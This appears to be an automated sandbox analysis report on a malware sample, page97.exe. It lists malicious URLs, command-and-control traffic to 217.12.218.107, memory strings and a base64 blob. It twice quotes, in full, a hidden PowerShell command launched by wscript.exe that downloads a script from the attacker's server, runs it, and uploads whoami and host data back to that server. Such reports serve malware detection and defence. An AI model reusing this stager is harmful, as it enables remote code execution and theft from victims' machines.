Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: http://217.12.218.107:25928/page97 |
Avira URL Cloud: Label: malware |
Source: http://217.12.218.107:30139/ZKcMQasOLRGSRjLa/page97/upgrade.txt |
Avira URL Cloud: Label: malware |
Source: http://217.12.218.107:30139/ZKcMQ |
Avira URL Cloud: Label: malware |
Source: http://217.12.218.107:3 |
Avira URL Cloud: Label: malware |
Source: http://217.12.218.107:30139 |
Avira URL Cloud: Label: malware |
Source: http://217.12.218.107:30139 |
Virustotal: Detection: 7% |
Perma Link |
Source: page97.exe |
ReversingLabs: Detection: 57% |
Source: page97.exe |
Virustotal: Detection: 70% |
Perma Link |
Source: page97.exe |
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: page97.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Source: |
Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2371877197.00000184BC352000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: n.pdb source: powershell.exe, 0000000B.00000002.2331550599.00000184BC180000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: em.Core.pdb# source: powershell.exe, 0000000B.00000002.2331550599.00000184BC14F000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 0000000B.00000002.2371877197.00000184BC352000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2331550599.00000184BC1F1000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb{|uD source: powershell.exe, 0000000B.00000002.2371877197.00000184BC352000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ion.pdb source: powershell.exe, 0000000B.00000002.2331550599.00000184BC1F1000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: n.pdb4 source: powershell.exe, 0000000B.00000002.2331550599.00000184BC180000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: e.pdbBr source: powershell.exe, 0000000B.00000002.2331550599.00000184BC14F000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb source: powershell.exe, 0000000B.00000002.2371877197.00000184BC352000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: winword.exe |
Memory has grown: Private usage: 3MB later: 69MB |
Source: global traffic |
TCP traffic: 192.168.2.5:49717 -> 217.12.218.107:30139 |
Source: Joe Sandbox View |
ASN Name: ITLDC-NLUA ITLDC-NLUA |
Source: unknown |
TCP traffic detected without corresponding DNS query: 217.12.218.107 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 217.12.218.107 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 217.12.218.107 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 217.12.218.107 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 217.12.218.107 |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A54D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2298540716.00000184A2425000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2371877197.00000184BC352000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://217.12.218.107:25928/page97 |
Source: wscript.exe, 00000005.00000002.2056263641.0000020D8D0D5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://217.12.218.107:3 |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A5368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2299298081.00000184A535D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://217.12.218.107:30139 |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A54D6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://217.12.218.107:30139/ZKcMQ |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A54D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2298540716.00000184A2425000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2371877197.00000184BC352000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://217.12.218.107:30139/ZKcMQasOLRGSRjLa/page97/upgrade.txt |
Source: powershell.exe, 0000000B.00000002.2371839899.00000184BC250000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://217.12.218.107:30139/zkcmqasolrgsrjla/page97/upgrade.txt |
Source: wscript.exe, 00000005.00000002.2056263641.0000020D8D0D5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://217.12.218.108u |
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.2.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab |
Source: powershell.exe, 0000000B.00000002.2321364554.00000184B3DA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2299298081.00000184A572E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2321364554.00000184B3EE6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A3F5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A3D31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A3F5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A3D31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000B.00000002.2321364554.00000184B3EE6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000B.00000002.2321364554.00000184B3EE6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000B.00000002.2321364554.00000184B3EE6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A3F5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 0000000B.00000002.2299298081.00000184A495D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 0000000B.00000002.2321364554.00000184B3DA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2299298081.00000184A572E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2321364554.00000184B3EE6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: page97.exe, Program.cs |
Base64 encoded string: System.Net |
Source: page97.exe, Program.cs |
Long String: Length: 16352 |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://217.12.218.107:30139/ZKcMQasOLRGSRjLa/page97/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://217.12.218.107:25928/page97',$drpy);} |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://217.12.218.107:30139/ZKcMQasOLRGSRjLa/page97/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://217.12.218.107:25928/page97',$drpy);} |
Jump to behavior |
Source: page97.exe, 00000000.00000002.2012777296.000000001B84C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameWinWord.exeB vs page97.exe |
Source: page97.exe, 00000000.00000002.2012777296.000000001B84C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameWinWord.ex vs page97.exe |
Source: page97.exe, 00000000.00000002.2012777296.000000001B84C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameschtasks.exej% vs page97.exe |
Source: page97.exe |
Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: page97.exe, Program.cs |
Base64 encoded string: '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 |